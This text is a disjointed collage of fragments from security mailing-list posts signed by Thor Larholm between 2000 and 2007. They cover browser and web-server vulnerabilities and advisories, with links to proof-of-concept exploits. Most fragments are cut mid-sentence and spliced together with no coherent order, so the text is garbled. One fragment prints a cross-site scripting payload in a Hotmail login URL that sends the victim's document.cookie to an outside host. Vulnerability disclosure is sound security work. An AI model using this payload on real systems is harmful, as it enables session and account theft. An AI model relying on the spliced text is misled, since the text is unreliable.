2.0.
http://larholm.com/2007/07/26/thunderbird-15-has-not-been-patched-with-osint/
Regards
Thor Larholm
Thor Larholm wrote:
The Mozilla application platform currently has an unpatched input
validation flaw which allows you to specify arbitrary command line
arguments to any registered URL
with the report and the XPI exploits can be found at
http://larholm.com/media/2007/7/mozillaprotocolabuse.zip
Cheers
Thor Larholm
handler. The
full advisory and a working Proof of Concept exploit can be found at
http://larholm.com/2007/07/10/internet-explorer-0day-exploit/
Cheers
Thor Larholm
interaction simply by visiting a webpage. The full advisory and a
working Proof of Concept exploit can be found at
http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/
Cheers
Thor Larholm
--
I call dibs on the first SafariWin bug
-execution/
Cheers
Thor Larholm
is that you can still read some local files on Windows
and all user accessible files on Linux/Unix/OS X, with all user
accessible files potentially readable as well on Windows through the
patch regression.
http://larholm.com/2007/06/04/unpatched-input-validation-flaw-in-firefox-2004/
Cheers
Thor
of Firebug should also prevent any closely related
vulnerabilities as Joe has updated his domplate constructors to
forcefully escape all strings before they are inserted into the
console HTML.
Cheers
Thor Larholm
On 4/4/07, pdp (architect) [EMAIL PROTECTED] wrote:
http://www.gnucitizen.org/blog
allows you to overwrite native DOM methods on a third-party domain,
broadening the potential attack scope by allowing you to interfere with
the operations of existing script code inside that third-party document.
--
Thor Larholm
PolyPath, CSO
covers the broader picture. I
guess the cat is out of the bag now, might as well release that soon ;)
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
-Original Message-
From: Richard M. Smith [mailto:[EMAIL PROTECTED]
Sent: Monday, August 04, 2003 11:58 AM
crashing svchost. Of course,
this is only with the new return addresses that are not tied to any
specific service pack.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
-Original Message-
From: khan rohail [mailto:[EMAIL PROTECTED]
Sent: Monday, July 28, 2003 8:34 AM
, both on a
webpage and in an email - even with scripting disabled in the Restricted
Zone, which has so far been a major mitigating factor. This means that an
email-borne exploit would execute immediately when a user opened or previewed
an HTML-based email.
Regards
Thor Larholm
PivX Solutions, LLC
Thor Larholm security advisory TL#006
-
16 July 2003
HTML format: http://pivx.com/larholm/adv/TL006
Topic: ISA Server HTTP error handler XSS.
Discovery date: 25 June 2002.
Severity: Medium
Affected applications:
--
Any Microsoft
exploitable on websites.
Since MHT files are opened automatically, just like certain other media
files, you can also open an MHT file automatically through an email message
in the Restricted Zone.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
the Internet Zone for viewing HTML mail? If so, it is
also still vulnerable to the codeBase command execution vulnerability, like
any other application that is embedding MSHTML.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Latest PivX research: Multi-Vendor Unreal Engine
directly against the best
interest and security of its own customers.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Latest PivX research: Multi-Vendor Unreal Engine Advisory
http://www.pivx.com/press_releases/ueng-adv_pr.html
as severe.
http://www.pivx.com/larholm/unpatched/
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Strike Now, StrikeFirst!
http://www.pivx.com/sf.html
This is just a copy of Andreas Sandblad's advisory, with a new command :)
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Strike Now, StrikeFirst!
http://www.pivx.com/sf.html
-Original Message-
From: Alan Rouse [mailto:[EMAIL PROTECTED]]
Sent: 11. november 2002 17:22
Monitoring which pages a user visits is also possible, and in general there
seem to be some oversights in this otherwise smooth rewrite.
Add to that some of the more odd bugs functionality-wise, and I would say
there is room for a beta 2 ;)
Regards
Thor Larholm, Security Researcher
PivX
zones.
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure?
http://www.PivX.com
-Original Message-
From: Andreas Sandblad [mailto:sandblad;acc.umu.se]
Sent: 6. november 2002 20:48
To: [EMAIL PROTECTED]
Subject: How to execute programs with parameters in IE
method and object. At first, I assumed
they had made a generic fix, but with this in the open it is clear that they
only patched specifics and that there will be many more vulnerabilities in
the method/object caching category.
Regards
Thor Larholm
This is not a vulnerability or even privacy exposure in MSN, but just a
demonstration of zone spoofing by using the %2F encoding bug.
All the exposed MSN contact list and information is intentionally, and
safely, exposed in the My Computer zone.
Regards
Thor Larholm, Security Researcher
PivX
.law5.hotmail.passport.com/cgi-bin/login?_lang=id=2fs=1cb=;sc
riptlocation.replace('http://jscript.dk/2002/10/sec/querystring.asp?$'.repl
ace('$',document.cookie));/scriptct=1033054530_setlang=,,-1,0
Regards
Thor Larholm
Jubii A/S - Internet Programmer
This also works in IE5.5 as well.
Besides reading cookies from arbitrary sites, this vulnerability also allows
local file reading and execution - when combined with the OBJECT
cross-protocol redirection vulnerability.
http://jscript.dk/2002/10/sec/SaveRefLocalFile.html
Regards
Thor Larholm
the minor version change 1.0 to 1.0.1, I have no idea about the amount of
issues that remain or that have been fixed so far.
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure?
http://www.PivX.com
From: Nick FitzGerald [mailto:[EMAIL PROTECTED]]
Hi Thor,
Doesn't the following have similar implications to the issue in your
TL#002 advisory??
Hi Nick,
close but no cigar - yet. In its current state, this % encoding issue cannot
escape protocol boundaries, which means that it cannot go
allowed HTTP traffic on
(most often) port 80.
Out of plain curiosity, how is this fixed in IE6SP1 - as the Netscape team
fixed it by demanding that both sites set document.domain, regardless of whether one
is the parent?
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure?
http
case you are out of
luck.
If your vulnerability did not deal with OWC, then excuse my intrusion and
let me guess at a Content-Type/Content-Disposition variant - though your
suggested workaround would make no sense then :)
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You
Thor Larholm, PivX, security advisory TL#003
-
By Thor Larholm, Denmark
10 July 2002
HTML format: http://www.PivX.com/larholm/adv/TL003/
Topic: IE allows universal Cross Domain Scripting.
Discovery date: 25 June 2002.
Severity: High
Affected applications
it quite
easy to e.g. execute arbitrary commands, undoubtedly a more fun
demonstration:
http://jscript.dk/Jumper/xploit/ftpfolderview.html
Status: 18 unpatched vulnerabilities.
http://jscript.dk/Unpatched/
Regards
Thor Larholm
Jubii A/S - Internet Programmer
not to be the only one who has discovered this fact. GreyMagic
Software have updated their advisory on the cssText vulnerability and
bundled a new example that works post MS02-023, which can be found at
http://sec.greymagic.com/adv/gm004-ie/
Regards
Thor Larholm
Jubii A/S - Internet Programmer
a list of 12 such. It can still be found at
http://jscript.dk/unpatched/
Just my .02 kroner of comments :)
Regards
Thor Larholm
Jubii A/S - Internet Programmer
files exist.
http://jscript.dk/2002/4/NS6Tests/LinkLocalFileDetect.asp
Regards
Thor Larholm
Jubii A/S - Internet Programmer
-Original Message-
From: GreyMagic Software [mailto:[EMAIL PROTECTED]]
Sent: 30. april 2002 03:11
To: NTBugtraq; Bugtraq
Subject: Reading local files in Netscape 6
that also works in moz1rc1 can be found at
http://jscript.dk/2002/4/NS6Tests/documentload.html
Regards
Thor Larholm
Jubii A/S - Internet Programmer
Thor Larholm security advisory TL#002
-
By Thor Larholm, Denmark.
16 April 2002
HTML Format: http://jscript.dk/adv/TL002/
Topic: IE allows universal Cross Site Scripting.
Discovery date: 18 March 2002.
Severity: High
Affected applications
Thor Larholm security advisory TL#001
-
By Thor Larholm, Denmark.
10 April 2002
HTML format: http://jscript.dk/adv/TL001/
Topic: IIS allows universal Cross Site Scripting.
Discovery date: 13 March 2002.
Severity: Medium
Affected applications
Further, the patch doesn't seem to work completely:
http://www.theregister.co.uk/content/4/24667.html
Though, in other cases, it works better than expected:
http://jscript.dk/unpatched/N280302-01.html
A revision of the patch may be in place.
Regards
Thor Larholm
Jubii A/S - Internet
ft was contacted on 4 December 2000.
Bug is considered to be a code quality bug, and will be addressed in a future SP
for IE.
--
Thor Larholm